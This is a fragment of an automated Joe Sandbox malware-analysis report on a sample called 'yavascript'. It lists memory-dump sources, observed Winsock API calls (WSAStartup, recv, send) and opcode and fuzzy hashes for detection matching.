                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                  • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                  • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                  • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                  • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                  • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                  • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                  • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                  • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                  • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                  • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                  • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                  • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36